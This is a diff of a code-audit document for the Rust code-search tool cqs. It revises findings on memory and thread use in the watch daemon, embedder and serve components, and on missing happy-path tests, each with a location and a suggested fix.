+- **Description:** During a background HNSW rebuild, `build_hnsw_index_owned` builds a `snapshot_hashes: HashMap<String, String>` with one entry per chunk. Each entry is roughly `30 B (id) + 64 B (hex hash) + 80 B (HashMap overhead)` ≈ 174 B. For a 100k-chunk corpus that's ~17 MB. This map is held in the background-rebuild thread for the *entire rebuild duration* (commonly 10-30s; longer on first builds), then handed across the channel to the watch loop, where `drain_pending_rebuild` reads it once at swap time to dedup the captured `pending.delta` against id-collisions, then drops it. Meanwhile the watch loop is *also* keeping the previous in-memory HNSW resident (~`chunk_count * dim * 4` = 400 MB at BGE-large 1024-dim) so search keeps working during the rebuild, and the rebuild thread is building the new HNSW (another 400 MB). Net peak: 2× HNSW + 17 MB map + delta. The 17 MB is small relative to 800 MB of HNSW, but it's *unnecessary* — the only consumer (`drain_pending_rebuild`) reads it after the rebuild completes and could fetch the snapshot fresh from SQLite at that point with a single `SELECT id, content_hash FROM chunks WHERE id IN (?,?,…)` against just the delta's ids (typically <`MAX_PENDING_REBUILD_DELTA` = small N), not the full 100k.
+- **Suggested fix:** Drop `snapshot_hashes` from the rebuild-thread return shape entirely. At swap time, `drain_pending_rebuild` already knows the delta's ids; do `store.get_content_hashes_by_ids(&delta_ids)` to fetch *just* the rows needed for collision detection. That's a bounded (delta-sized) query against fresh SQLite state, not a full-corpus snapshot held for the rebuild's lifetime. Saves ~17 MB during every rebuild on a 100k-chunk repo, and removes the cross-thread `HashMap<String, String>` serialization cost.
 
-#### [RM-V1.30-5]: Daemon never checks `fs.inotify.max_user_watches` — silently drops events on large monorepos
+#### RM-5: Reconcile pass holds the entire repo's filename set + index origins in RAM simultaneously every 30s
 - **Difficulty:** medium
-- **Location:** `src/cli/watch.rs:1947-1949`
-- **Description:** `RecommendedWatcher::new(...).watch(&root, RecursiveMode::Recursive)` walks the tree and registers an inotify watch per directory. Linux's `fs.inotify.max_user_watches` defaults to 8192 on older distros, 65536-1048576 on newer ones. On a project with deep `node_modules/`, `target/`, `vendor/`, or `dist/` directories — none of which are filtered before `watch()` because `notify` registers everything before our gitignore filter sees it — the limit can be silently exceeded. `notify` returns `Err` on registration failure for individual sub-directories but the `watch(root, Recursive)` call at line 1949 only returns the *root* registration error. Per-subdir failures are swallowed, leading to "watch isn't picking up changes in src/foo/" with zero diagnostic output. The `--poll` fallback exists but the daemon never auto-detects exhaustion to suggest it.
-- **Suggested fix:** At daemon startup, read `/proc/sys/fs/inotify/max_user_watches` and `/proc/<pid>/status` (Inotify count). If the project's directory count is within 90% of the limit, log a `tracing::warn!` recommending `--poll` or a `sysctl fs.inotify.max_user_watches=524288` bump. For inotify-watcher, replace the direct `watch(&root, Recursive)` with a manual descent that respects the gitignore matcher: only watch directories that wouldn't be ignored anyway (avoids registering target/, node_modules/, .git/). This both reduces inotify pressure and matches the user's expectations about which paths the daemon should react to.
+- **Location:** `src/cli/watch/reconcile.rs:74-90` (`enumerate_files` + `indexed_file_origins`) + `src/lib.rs:618` (`enumerate_files` returns `Vec<PathBuf>` not iterator)
+- **Description:** `run_daemon_reconcile` runs every 30s by default (`CQS_WATCH_RECONCILE_SECS`) when the daemon is idle. Each tick:
+  1. `enumerate_files(root, &exts, no_ignore)` returns a `Vec<PathBuf>` materialized via `walker.collect::<Vec<_>>()` — the *entire* tree's matching files in one allocation (lib.rs:618). For a 100k-file monorepo at avg 80 B/PathBuf that's ~8 MB.
+  2. `indexed_file_origins()` returns a `HashMap<String, Option<i64>>` with one entry per indexed source file — typically ~30k entries × ~120 B = ~3.5 MB.
+  3. Both are held simultaneously through the loop body that does set-difference and metadata() probes.
+  Every 30s, ~12 MB allocated, walked, and dropped. Not a leak — the allocations are scoped — but it's repetitive heap churn the watch daemon pays *forever in idle*, and it doesn't scale: a 1M-file Chromium-class repo would hit ~120 MB transient per tick. The walker already supports streaming (`Walk::iter()`) and the `indexed` map could be queried per-file with a prepared statement during the walk, but the current shape forces an all-at-once materialization. Reconcile is also single-threaded and CPU-bound on the walk under WSL `/mnt/c/`, holding the watch loop off rebuilding for the duration.
+- **Suggested fix:** Stream the disk walk: change `enumerate_files` to expose an `enumerate_files_iter(root, exts, no_ignore) -> impl Iterator<Item = anyhow::Result<PathBuf>>` (the `Vec`-collecting version stays as a thin wrapper for callers that genuinely need the count). In reconcile, switch `for rel in disk_files` to consume the iterator directly, prepared-statement-querying `chunks.source_mtime WHERE origin = ?` per file (or chunked in 1k batches) instead of pre-loading the full `indexed` HashMap. Memory drops to O(batch_size) regardless of repo size, and the walk + DB lookups overlap in time. Important enough that #1182's whole-tree-walk-on-idle premise should not break on a 1M-file repo.
 
-#### [RM-V1.30-6]: `select_provider()` triggers CUDA/TensorRT probe + symlink ops for every CLI process, including no-embed commands
-- **Difficulty:** medium
-- **Location:** `src/embedder/provider.rs:171-248`, `src/embedder/mod.rs:312-313`
-- **Description:** PR #1120 (Phase A) refactored execution-provider detection but kept the call-site contract: `Embedder::new` → `select_provider()` → `detect_provider()` → `ensure_ort_provider_libs()`. Even with `CACHED_PROVIDER: OnceCell` memoizing the result, the *first* call within a process always: walks `~/.cache/ort.pyke.io/dfbin/<triplet>/`, sorts directory entries, reads `/proc/self/cmdline`, joins multiple `PathBuf`s, calls `dunce::canonicalize` on each library, and `std::os::unix::fs::symlink`s up to 3 `.so` files into both `ort_search_dir` and the first writable `LD_LIBRARY_PATH` entry. On a CLI invocation that never reaches `embed_query` (e.g. `cqs notes list`, which constructs an embedder via `try_model_config`), this is pure waste — the CUDA probe `ort::ep::CUDA::default().is_available()` itself can take 200-500ms because it lazily loads `libcudart.so` and pings the driver. Phase A's `ep-coreml` / `ep-rocm` cfg-gates are correct in spirit but they're cfg-gates over branches that today are dead `tracing::warn!` arms — the `ensure_ort_provider_libs` always fires regardless.
-- **Suggested fix:** Move the provider probe + symlink work into a `LazyLock<ExecutionProvider>` that fires only inside `Session::create_session(model_path, ...)` — i.e. on the first actual ONNX inference, not on every `Embedder::new`. Construction-time should know the *target* provider (from CLI flag / env) but defer side effects until needed. The `Mutex<Option<Session>>` already supports lazy session init; making provider detection equally lazy keeps no-embed commands free of the GPU probe + symlink overhead.
-
-#### [RM-V1.30-7]: `LocalProvider::submit_via_chat_completions` worker threads use default 2 MB stack — `concurrency=64` allocates 128 MB just for the fan-out
+#### RM-6: `serve` auth path allocates a fresh `format!("{cookie_name}=")` String on every authenticated request
 - **Difficulty:** easy
-- **Location:** `src/llm/local.rs:163-256` (`std::thread::scope` in `submit_via_chat_completions`)
-- **Description:** `local_concurrency()` clamps `CQS_LOCAL_LLM_CONCURRENCY` at `[1, 64]`. At the upper end, `std::thread::scope` spawns 64 worker threads via `s.spawn(...)` (line 176) with the platform default stack (2 MB on glibc) — 128 MB of stack space just for batch fan-out, on top of the per-thread `reqwest` blocking client state and JSON parsing buffers. The worker body is shallow (channel recv → reqwest send → JSON parse → mutex insert → callback) so 256 KB or 512 KB would suffice. The cap is also surprisingly high: 64 concurrent HTTPS connections to a local llama.cpp server is going to thrash the GPU, not parallelize — the practical sweet spot for `vllm` on an RTX 4000 is 4-8.
-- **Suggested fix:** Use `std::thread::Builder::new().stack_size(512 * 1024).name(format!("cqs-llm-worker-{i}"))` inside a manual scope (or `scope.builder()` if one stabilizes — currently scoped threads use `Scope::spawn` without a stack-size hook, so swap to a `std::thread::Builder` + manual join Vec). Drop the upper clamp from 64 to 16; at >16 the local server is the bottleneck anyway.
+- **Location:** `src/serve/auth.rs:292`
+- **Description:** Inside `check_request`, the cookie-channel branch does `let needle = format!("{cookie_name}=");` on every request. `cookie_name` is per-port-fixed (set at `cqs serve` startup, see #1135) — there is exactly one cookie name for the lifetime of the server. The format-and-allocate happens once per HTTP request. At the dashboard's typical load (an agent fanning out 50-100 graph/search/chunk requests per page) that's 50-100 short-lived `String` allocations per second, none of which the allocator can pool because each is dropped before the next is created. Comparable per-request work happens in `strip_token_param` (line 246-260 — allocates a `Vec<&str>` and joins) but only when the *post-auth redirect* fires, which is once per session. The cookie needle is in the *steady-state* request path.
+- **Suggested fix:** Pre-build the needle once in `AuthMiddlewareState::new` (or store it on `AuthMiddlewareState` directly as `cookie_needle: String`), then the auth check borrows `&self.cookie_needle` instead of allocating per request. Saves an allocation per authenticated request at zero behavioural change. Same shape would also let the bearer-prefix `"Bearer "` be a `&'static str` constant if it isn't already.
 
-#### [RM-V1.30-8]: `serve` handlers spawn one `tokio::task::spawn_blocking` per HTTP request, default blocking pool is 512 threads (~1 GB stack)
-- **Difficulty:** medium
-- **Location:** `src/serve/handlers.rs:86-89,100+,...` (every handler has a `spawn_blocking`), `src/serve/mod.rs:92-95`
-- **Description:** Every `cqs serve` route handler wraps its `Store` call in `tokio::task::spawn_blocking(...)` (six occurrences; at lines 86, ~100, ~140, ~180, ~210). The runtime is built via `Builder::new_multi_thread().enable_all().build()` (mod.rs:92-95) which uses tokio's defaults: `worker_threads = num_cpus` (already noted in RM-V1.29-6) and `max_blocking_threads = 512`. A hostile or buggy client opening 512 parallel `/api/graph` requests (loading a 50k-node graph response each) can saturate the blocking pool — each blocking thread holds the default 2 MB Linux stack + the SQL working set (`HashMap::with_capacity(rows.len())` for up to 50k rows = several MB). Worst case: 512 × (2 MB stack + ~10 MB working set) ≈ 6 GB. The fact that v1.30.0 added per-launch auth (#1118) closes the trivial unauthenticated DoS vector, but an authenticated user (or a malicious browser tab on the same host once they've grabbed the cookie) can still launch this.
-- **Suggested fix:** `.max_blocking_threads(8)` on the `Builder` — 8 concurrent SQL queries is more than enough for an interactive single-user UI. Combined with `.worker_threads(4)` from RM-V1.29-6 the daemon's max steady-state thread count is bounded at 12, vs. 512+num_cpus today. Optionally also wrap the inner `Store::rt.block_on` calls with a `tokio::time::timeout(30s, ...)` so a stuck SQL query doesn't pin a blocking thread indefinitely.
-
-#### [RM-V1.30-9]: `LocalProvider::http` uses default reqwest connection pool (no idle cap, no per-host limit)
+#### RM-7: `check_request` cookie loop scans every `;`-separated pair even after a match
 - **Difficulty:** easy
-- **Location:** `src/llm/local.rs:97-100`
-- **Description:** `Client::builder().timeout(timeout).redirect(Policy::none()).build()` — no `pool_max_idle_per_host`, no `pool_idle_timeout`, no `tcp_keepalive`. reqwest's blocking client defaults to `pool_max_idle_per_host = usize::MAX` and `pool_idle_timeout = 90s`. On a long-running `cqs index --llm-summaries` that submits batches over hours, the connection pool to the local server can grow without bound — particularly bad against vLLM, which is single-process and sees each idle keep-alive as a held slot in its connection table. If the daemon embeds `LocalProvider` (it doesn't today, but the LLM path is converging on daemon execution), pool growth becomes permanent.
-- **Suggested fix:** `Client::builder().pool_max_idle_per_host(self.concurrency).pool_idle_timeout(Duration::from_secs(30)).timeout(timeout)...`. Caps the idle pool at the worker count (extra idle connections beyond `concurrency` are by definition unused) and recycles after 30s of idle.
+- **Location:** `src/serve/auth.rs:287-300`
+- **Description:** The cookie-header branch in `check_request` does `for pair in cookie_header.split(';')`. When the request carries an unrelated leading cookie (e.g. `_ga=GA1.2.123; cqs_token_8080=abc`) that isn't `cqs_token_*`, the loop continues to subsequent pairs and `strip_prefix(&needle)` returns `None` until it hits ours. That's correct. However, the loop doesn't `break` on a successful `ct_eq` — it returns. So far fine. The actual issue: `pair.trim().strip_prefix(&needle)` allocates nothing, but `needle` is the heap-allocated `format!("{cookie_name}=")` from RM-6. Fix RM-6 and the per-pair work shrinks to a `&str` comparison. (Not a separate finding from RM-6 in impact, but the fix surface is the same line.)
+- **Suggested fix:** Subsumed by RM-6's pre-built needle. No additional work.
 
-#### [RM-V1.30-10]: `Mutex<Option<Arc<Tokenizer>>>` pattern in `Embedder` keeps a stale tokenizer Arc alive on `clear_session` if any inference is in flight
-- **Difficulty:** medium
-- **Location:** `src/embedder/mod.rs:261,808-823`
-- **Description:** `clear_session` sets `*self.tokenizer.lock() = None` (line 820-821), but the comment on line 256-258 explicitly says *"Arc holds a strong ref so in-flight inference that grabbed an Arc clone before this call continues with its own copy."* This is correct for safety, but the implication is that if a long-running inference (e.g. a batch of 1000 chunks at 4ms each = 4s of work) is mid-flight when `sweep_idle_sessions` fires, the tokenizer Arc stays in memory until that batch completes — the BGE-large tokenizer is ~10 MB, larger BPE vocabularies are ~20 MB. Concurrently, the next inference call after `clear_session` lazy-reloads the tokenizer (10-30 ms), so for a brief window the daemon holds *two* tokenizer copies. Combined with the parallel session reload (~500 MB), the actual peak memory during the "clear → next-use" handoff is ~1 GB rather than the documented ~500 MB. This is documented behavior, but the actual lifecycle isn't surfaced anywhere — the idle-eviction path looks like a clean drop-and-reload to the operator.
-- **Suggested fix:** Either (a) wait for in-flight inference before clearing — adds a `RwLock` around the tokenizer Arc and `clear_session` takes the write lock, blocking until inference releases its read lock; or (b) document the doubled-memory window in the `clear_session` doc comment and surface it via a `tracing::info!(stage = "clear_during_inference", ...)` event when `Arc::strong_count(&tok) > 1` at clear time so operators can correlate memory spikes. Option (b) is the lower-risk fix since (a) extends the inference critical section.
+## Test Coverage — happy-path gaps
 
-## Summary
-Found 10 resource-management issues new in v1.30.0:
-- (1) PR #1113 detached HNSW rebuild thread can outlive daemon shutdown and contend on GPU/index lock with the next daemon's rebuild;
-- (2) sibling issue: `pending_rebuild.delta` is unbounded — bulk git operations during a rebuild window can pin 100MB+;
-- (3) `Embedder::new` opens a fresh `QueryCache` SQLite + 7-day prune on every CLI subcommand even when no embedding ever happens;
-- (4) PR #1101's `LocalProvider::stash` retains all submitted batch results until provider drop, with no LRU/TTL/cap;
-- (5) inotify watcher silently drops events on large monorepos — daemon never checks `fs.inotify.max_user_watches` or warns;
-- (6) PR #1120's `select_provider()` still fires CUDA probe + symlink work eagerly via `Embedder::new` even on no-embed commands;
-- (7) `LocalProvider` worker threads use default 2MB stack, allocating 128MB at `concurrency=64`;
-- (8) `cqs serve` handlers `spawn_blocking` without `max_blocking_threads` cap — authenticated user can pin 512 threads × ~10MB working set;
-- (9) `LocalProvider::http` reqwest client has no pool_max_idle / idle_timeout, can leak idle connections to local server over a long indexing run;
-- (10) `Embedder::clear_session` documents but doesn't surface the doubled-memory window when in-flight inference holds a tokenizer Arc concurrent with a session reload.
-
-
-## Test Coverage (happy path)
-
-#### TC-HAP-1.29-1: `cqs serve` data endpoints (`build_graph`, `build_chunk_detail`, `build_hierarchy`, `build_cluster`) never tested with populated data
-- **Difficulty:** medium
-- **Location:** `src/serve/data.rs:192` (`build_graph`), `:452` (`build_chunk_detail`), `:586` (`build_hierarchy`), `:825` (`build_cluster`), `:933` (`build_stats`). All tests are in `src/serve/tests.rs` and use `fixture_state()` at line 25 which creates an empty init-only store.
-- **Description:** The entire `cqs serve` subsystem (new in v1.29.0) has 14 endpoint tests, but every test runs against an empty store. Result: `graph_returns_empty_for_fresh_store` asserts `nodes.len() == 0`, `chunk_detail_unknown_id_returns_404` asserts 404, `hierarchy_unknown_root_returns_404` asserts 404, `cluster_returns_empty_for_fresh_store` asserts `nodes.len() == 0`. The test file comment at line 417-419 (`graph_returns_empty_for_fresh_store`) even admits this: *"Real graph rendering is exercised by manual smoke against the cqs corpus; an in-process test would need a populated fixture (~few hundred LOC of chunk inserts) which is more setup than the shape-check is worth at this stage."* The SQL queries in `build_graph` (cf. `src/serve/data.rs:219-260` correlated subquery for n_callers, edge resolution at `:300-440`), the BFS in `build_hierarchy` (`:620-655`), UMAP-coord lookup in `build_cluster` (`:829-924`), and the caller/callee enrichment in `build_chunk_detail` (`:452-577`) are all untested with actual chunks. A mistake in any of these (e.g., filter-by-file bug, max_nodes clamp off-by-one, direction=callers/callees confusion) ships silently — there is no positive test that asserts "if you index 3 chunks with 2 call edges, `/api/graph` returns 3 nodes and 2 edges".
-- **Suggested fix:** Add a module in `src/serve/tests.rs` (or new file) that uses `common::InProcessFixture`-style chunk seeding to populate the store with a small call graph (e.g. `process_data` → `validate` → `format_output`, plus a test chunk). Then assert:
-  - `build_graph` returns 3 data nodes + 2 call edges; `max_nodes=1` truncates; `file_filter` narrows; `kind_filter="function"` excludes tests.
-  - `build_chunk_detail(store, "process_data_chunk_id")` returns `callers.len()==0, callees.len()==2, tests.len()==1`.
-  - `build_hierarchy(store, root, Direction::Callees, depth=5)` returns the 3-node subtree; direction=Callers returns just the root; depth=1 truncates.
-  - `build_cluster` returns N nodes with coords when UMAP coords are populated; returns `skipped=N` when they are not.
-
-#### TC-HAP-1.29-2: Batch dispatch handlers (`dispatch_gather`, `dispatch_scout`, `dispatch_task`, `dispatch_where`, `dispatch_onboard`, `dispatch_callers`, `dispatch_callees`, `dispatch_impact`, `dispatch_test_map`, `dispatch_trace`, `dispatch_similar`, `dispatch_explain`, `dispatch_context`, `dispatch_deps`, `dispatch_related`, `dispatch_impact_diff`) have zero tests
-- **Difficulty:** medium
-- **Location:** `src/cli/batch/handlers/misc.rs:15, 131, 173, 209` (gather/task/scout/where); `src/cli/batch/handlers/graph.rs:24, 63, 103, 143, 233, 292, 375, 392` (deps/callers/callees/impact/test_map/trace/related/impact_diff); `src/cli/batch/handlers/info.rs:46, 100, 168, 302` (explain/similar/context/onboard).
-- **Description:** Only `dispatch_search` has inline tests (5 of them in `src/cli/batch/handlers/search.rs:528-742`). The other **16** batch dispatch functions have zero tests. These are the daemon-hot-path handlers every agent hits via `cqs batch` and the socket path — a shape change to the JSON output or a regression in a chunk resolver bubbles silently until an agent notices. Grep confirms: no test file in `tests/` references any of these dispatch fns (only `real_eval_callgraph.json` mentions `dispatch_trace` as a pattern label). Batch 1 triage item P2 #48 addressed `dispatch_review/dispatch_diff/dispatch_drift/dispatch_blame/dispatch_plan`, but the read-only graph/info/search surface was not included.
-- **Suggested fix:** Add a single integration file `tests/batch_handlers_test.rs` that uses `common::InProcessFixture` to seed a small corpus + call graph, then calls each handler through `BatchContext::dispatch_line("<cmd> <args>", &mut sink)` and asserts the JSON envelope's `data` field has the expected keys + a non-empty results array. One test per handler is enough. Example: `ctx.dispatch_line("callers process_data", &mut sink)` → JSON has `callers: [...]` with the seeded caller. Follows the exact same pattern `dispatch_search` tests already use (`create_test_context`, seeded chunks).
-
-#### TC-HAP-1.29-3: `Reranker::rerank` and `Reranker::rerank_with_passages` have no tests
-- **Difficulty:** medium
-- **Location:** `src/reranker.rs:160` (`rerank`), `:190` (`rerank_with_passages`). Only `sigmoid` (a scalar helper) has tests (lines 450+).
-- **Description:** `rerank`/`rerank_with_passages` are the two public entry points of the cross-encoder re-ranking subsystem — they take a `Vec<SearchResult>` + query and rescore via ORT. Zero tests pin their contract. The only callers in `tests/` are `eval_harness.rs:527` and `model_eval.rs:1417`, both of which use the reranker as a black box inside an evaluation loop and neither asserts behaviour of a specific (query, passages) pair. A regression in the pair-encoding (batch concat, attention mask), the sigmoid mapping to scores, or the ORT session call would surface as "eval scores moved slightly" rather than a unit-test failure. Given the reranker was flagged in recent audits as a correctness-critical scoring component (see P3 #100 "reranker over-retrieval pool ... duplicated 4x"), its own surface needs at least one happy-path pin.
-- **Suggested fix:** Add two tests (likely `#[ignore]`-gated because they need the reranker model on disk — same shape as the existing ignored model tests):
-  - `test_rerank_preserves_input_set_reorders_by_score`: seed 3 passages with obviously different relevance to a query ("rust async await" → ["tokio runtime docs", "how to bake sourdough", "rust futures trait"]); assert all 3 are returned and the baking passage ranks last.
-  - `test_rerank_with_passages_empty_input_returns_empty_output`: pin the no-op shortcut. (This is the one test a non-model-loading run could cover.)
-
-#### TC-HAP-1.29-4: `cmd_project { Register, Remove, Search }` — only `Register/List/Remove` has a CLI test; `Search` has no CLI integration test
-- **Difficulty:** medium
-- **Location:** `src/cli/commands/infra/project.rs:70` (`cmd_project`). Existing CLI tests: `tests/cli_surface_test.rs:170` `project_register_list_remove_round_trips`, `:252` `project_remove_nonexistent_succeeds_quietly`, `tests/cli_envelope_test.rs:133` `cqs --json project search anything`.
-- **Description:** The `Search` subcommand (the one that does actual cross-project semantic search via `search_across_projects`, lines 119-164) runs `Embedder::new` → `embed_query` → `search_across_projects` → emit. The only existing test `tests/cli_envelope_test.rs:133` invokes `cqs --json project search anything` but asserts **only** the envelope shape, not that results were returned. There is no test that registers two projects, indexes both, runs `project search <query>`, and asserts results from both projects are interleaved and tagged with their project name. Inline tests in `src/cli/commands/infra/project.rs:178-207` only exercise `ProjectSearchResult` JSON serialization, not the end-to-end path. This is the ONLY cross-project-search surface — a regression (wrong project_name tag, dedup across projects collapsing results, weight application across indexes) ships silently.
-- **Suggested fix:** Add `tests/cli_project_search_test.rs` with one test that uses `InProcessFixture` to create two temp stores (projects), writes distinct content in each, invokes `cqs project register` twice, then `cqs project search "<term>"`, and asserts: (a) at least one result comes from each project, (b) the `project` field on each result matches the registered name, (c) exit code 0. Can share the cross-project fixture from `tests/cross_project_test.rs`.
-
-#### TC-HAP-1.29-5: `cmd_ref_add`, `cmd_ref_list`, `cmd_ref_remove`, `cmd_ref_update` (CLI) have no end-to-end test; only library-level helpers tested
-- **Difficulty:** medium
-- **Location:** `src/cli/commands/infra/reference.rs:88, 187, 320, 350` (add/list/remove/update). Tests in `tests/reference_test.rs` (397 lines, 11 tests) exercise `merge_results`, `search_reference`, `validate_ref_name` — all library functions. `tests/cli_drift_diff_test.rs:114` calls `cqs ref add` as setup for drift/diff tests but asserts only the drift output, not the ref add shape.
-- **Description:** The 4 CLI subcommands under `cqs ref` do real work: `add` runs `enumerate_files` + `run_index_pipeline` + `build_hnsw_index` + `add_reference_to_config` (see lines 128-179); `list` reads every reference's DB for chunk counts (lines 187-280); `remove` validates existence + rewrites config (lines 320-340); `update` re-indexes from source. None have a happy-path CLI test. Impact: a regression in the TOML config round-trip (`add_reference_to_config` at `src/config.rs`), or in HNSW-per-reference path, or in the chunk-count aggregation shown by `list`, would ship unnoticed. The drift/diff tests use `ref add` but only as setup — they don't validate its output shape.
-- **Suggested fix:** Add `tests/cli_ref_test.rs` with 4 tests:
-  - `ref_add_then_list_shows_reference_with_chunk_count` — add a tiny reference (2 files), then `ref list --json` and assert `[{name, path, chunks: >=2}]`.
-  - `ref_remove_deletes_from_config_and_disk` — add, then remove, then `ref list` returns empty.
-  - `ref_update_reindexes_source_content` — add, modify a source file, `ref update`, assert chunk count changed.
-  - `ref_add_weight_rejects_out_of_range` — pin `0.0..=1.0` contract (already tested at library level via `validate_ref_name` but not CLI-level).
-
-#### TC-HAP-1.29-6: `cqs batch` daemon socket (`handle_socket_client`) — no happy-path test that a valid command round-trips through the socket
-- **Difficulty:** medium
-- **Location:** `src/cli/watch.rs:160` (`handle_socket_client`). Referenced by Batch 1 TC-ADV-1.29-3 for adversarial cases; this finding is the happy-path complement. `tests/daemon_forward_test.rs` has 9 tests but only covers the CLI-forwarding translator (`translate_cli_args_to_batch`) and `ping` — not a real dispatch-line round trip.
-- **Description:** `handle_socket_client` is the daemon hot-path — every systemd-deployed `cqs watch --serve` instance serves ALL agent queries through it. The 9 tests in `daemon_forward_test.rs` cover only the pre-socket translation layer + `ping`. There is no test that sends `{"command":"search","args":["foo"]}` down a `UnixStream` pair, reads the response, and asserts `{data: {results: [...], total: N}}`. A regression in the framing layer (newline vs length-prefix, NUL-termination, gzip wrap), the JSON envelope wrap (P2 #28 already overlapped this for CLI; socket path is distinct), or the per-command dispatch registration in `dispatch_socket_command` would not surface until an agent noticed a broken batch response. The existing `tests/daemon_forward_test.rs:321` `test_mock_socket_round_trip_for_daemon_command` is labelled "mock socket" — it's actually a one-sided harness; see the file for details.
-- **Suggested fix:** Add `tests/daemon_socket_roundtrip_test.rs` that creates a `tokio::net::UnixStream::pair()`, spawns `handle_socket_client` against the server half with a minimal `BatchContext` + seeded store, writes a newline-terminated JSON request, reads the response, and asserts envelope shape + payload. Cover one read-only command (e.g. `stats` — no embedder needed) to avoid model load cost.
-
-#### TC-HAP-1.29-7: `cmd_similar` (CLI) has no integration test; only inline serialization tests and module-level `find_similar` tests
+#### TC-HAP-1.30.1-1: `cmd_install` upgrade-marker path never executed by any test
 - **Difficulty:** easy
-- **Location:** `src/cli/commands/search/similar.rs:41` (`cmd_similar`). Inline tests at line 280+ test output struct serialization only (5 tests, none exercise `cmd_similar`). Library `find_similar`/`find_related` is tested in `tests/related_impact_test.rs`.
-- **Description:** `cmd_similar` is the CLI entry point for "find functions similar to X by embedding distance". No test invokes it with real input. The library `find_similar` is tested but `cmd_similar` adds: target-function lookup (`store.search_by_name`), embedding fetch, pattern filter application (line 72+), and typed-output JSON build. Each is a regression surface. Very cheap to add because `InProcessFixture` already has the scaffolding and `find_similar` can use `MockEmbedder`.
-- **Suggested fix:** Add one test in `src/cli/commands/search/similar.rs::tests` using in-process fixture: seed 3 functions, call `cmd_similar(&ctx, "foo")`, capture stdout via a `Write` sink (the fn currently uses `println!`; if that makes it hard, add to the JSON path only — `--json` sinks via `emit_json`). Assert output contains the other 2 as similar results.
+- **Location:** src/cli/commands/infra/hook.rs:149-200 (production); 414-487 (tests)
+- **Description:** The four tests in the `tests` mod cover `render_hook_script` (template content), `locate_git_hooks_dir` (path fallback), and a hand-written `write_hook_script` loop that simulates a fresh-install. None of them invoke `cmd_install` itself. The crucial branch — `Some(content)` containing `HOOK_MARKER_PREFIX` → `report.upgraded.push(hook)` (lines 175-181) — is the entire idempotence claim of `cqs hook install`. It has zero test coverage. The `skipped_existing` branch (foreign hook detected, line 182-187) is "tested" only by `install_skips_foreign_hook_marker_check`, which **re-implements the marker-check inline** rather than calling production code (line 463-464 admits "Reproduce the marker check inline so the assertion is independent of the (file-system-bound) `cmd_install` function"). A future refactor that flips `contains(HOOK_MARKER_PREFIX)` to `starts_with` (a real possibility — the marker is line-2-not-line-1 by design) silently breaks idempotence: every `cqs hook install` re-run on an existing cqs-managed hook would land in the *foreign* arm and stop overwriting. No test catches it.
+- **Suggested fix:** Add `cmd_install_upgrade_replaces_v0_marker_with_current` — write a fake hook with body `# cqs:hook v0\n...` to a tempdir, run the `cmd_install` *body* (factor out a `do_install(git_dir, no_overwrite)` so the test doesn't need `find_project_root`), assert the file's content now contains `HOOK_MARKER_CURRENT`. Add `cmd_install_idempotent_second_run_only_upgrades` — run twice, assert the second run reports `upgraded == 3` and `installed == 0`. Add `cmd_install_no_overwrite_skips_missing_hooks` — fresh tree with `no_overwrite=true`, assert `skipped_no_overwrite.len() == 3` and no files were written.
 
-#### TC-HAP-1.29-8: `cmd_ci` happy path — library `ci::analyze_diff` tested, CLI function only tested in error paths
-- **Difficulty:** easy
-- **Location:** `src/cli/commands/review/ci.rs:9` (`cmd_ci`). Tests in `tests/ci_test.rs` cover library `ci::analyze_diff` (happy path: yes); `tests/cli_train_review_test.rs` has CLI tests for `cmd_ci` but they are error-path only (P2 #46 deliverable — see the batch 1 audit summary).
-- **Description:** The CLI surface for `cqs ci` (which produces the GitHub-Actions-style review comment) runs: diff parsing → `analyze_diff` → `cqs_format` / `markdown_format` output → exit code assignment. `cli_train_review_test.rs` (line 154+) has a comment "P2 #46 (b) — `cmd_task`" and covers only failure modes. There is no test that feeds a real diff into `cmd_ci` and asserts the output markdown contains the expected sections ("High-risk changes", "Tests"). A regression in markdown formatting or exit-code mapping (lines 47-95 in ci.rs) ships silently.
-- **Suggested fix:** Add one happy-path test in `tests/cli_train_review_test.rs` or a new `cli_ci_test.rs`: feed a real unified-diff string (modify a known indexed function) to `cmd_ci`, assert stdout contains "High-risk" when the diff touches a hotspot and the exit code matches the severity level set at `cli/commands/review/ci.rs:62-87`.
-
-#### TC-HAP-1.29-9: `cmd_gather` (CLI) untested; only library `gather()` tested
-- **Difficulty:** easy
-- **Location:** `src/cli/commands/search/gather.rs:77` (`cmd_gather`). Inline tests at bottom cover output shape; `tests/gather_test.rs` tests library `gather()`. CLI-level `cmd_gather` has zero integration tests.
-- **Description:** `cmd_gather` adds BFS depth / max_files clamping, content injection via `inject_content_into_gather_json` (unique to CLI path, not library), token budget trimming via `apply_token_budget`, and the JSON envelope wrap. A regression in any of these silently alters the output agents rely on for `/investigate` and `cqs task`. Library tests don't exercise these CLI-only steps.
-- **Suggested fix:** Add one test in `tests/cli_gather_test.rs` (or reuse `tests/gather_test.rs` harness with `cqs()` spawning): seed a 3-function corpus, run `cqs gather "foo" --json --max-files 2`, assert the response envelope has `results.len() == 2` (clamp worked), `tokens_in/tokens_out` fields present when `--tokens N` passed, content injected into each file_group.
-
-#### TC-HAP-1.29-10: `dispatch_line` has no happy-path test that verifies a valid command produces a correct JSON response
-- **Difficulty:** easy
-- **Location:** `src/cli/batch/mod.rs:557` (`dispatch_line`). Tests at lines 1908 (`bumps_query_counter` with a `bogus` input — error), 2124 / 2161 / 2198 (all adversarial — NUL bytes, unbalanced quotes).
-- **Description:** Every existing `dispatch_line` test uses either a parse-failure input (`bogus`) or an adversarial malformed input. There is no test that sends a valid `search foo` / `stats` / `dead` down `dispatch_line`, reads the `Vec<u8>` sink, parses the JSON, and asserts envelope shape. The tests pin error_count/query_count invariants but not the actual output — a regression that produced the error envelope where it should have produced a success envelope would still pass the counter checks. Relatedly, `dispatch_search` is well-covered at the **handler** level but the **dispatch-line** wrap (clap parsing → handler routing → envelope serialization → newline emission) is not.
-- **Suggested fix:** Add one test in `src/cli/batch/mod.rs::tests`: `test_dispatch_line_stats_emits_success_envelope` — run `ctx.dispatch_line("stats", &mut sink)` against an init-only store, parse the `sink` bytes as JSON, assert `json["data"]["total_chunks"].is_number()` and `json["error"].is_null()`. Small. Would catch P2-class regressions (envelope-shape changes, stats serialization drift).
-
-#### TC-HAP-1.30-1: `spawn_hnsw_rebuild` and `drain_pending_rebuild` (non-blocking HNSW rebuild, #1113) ship in v1.30.0 with zero tests
+#### TC-HAP-1.30.1-2: `cmd_uninstall`, `cmd_fire`, `cmd_hook_status` — three entire CLI commands have zero tests
 - **Difficulty:** medium
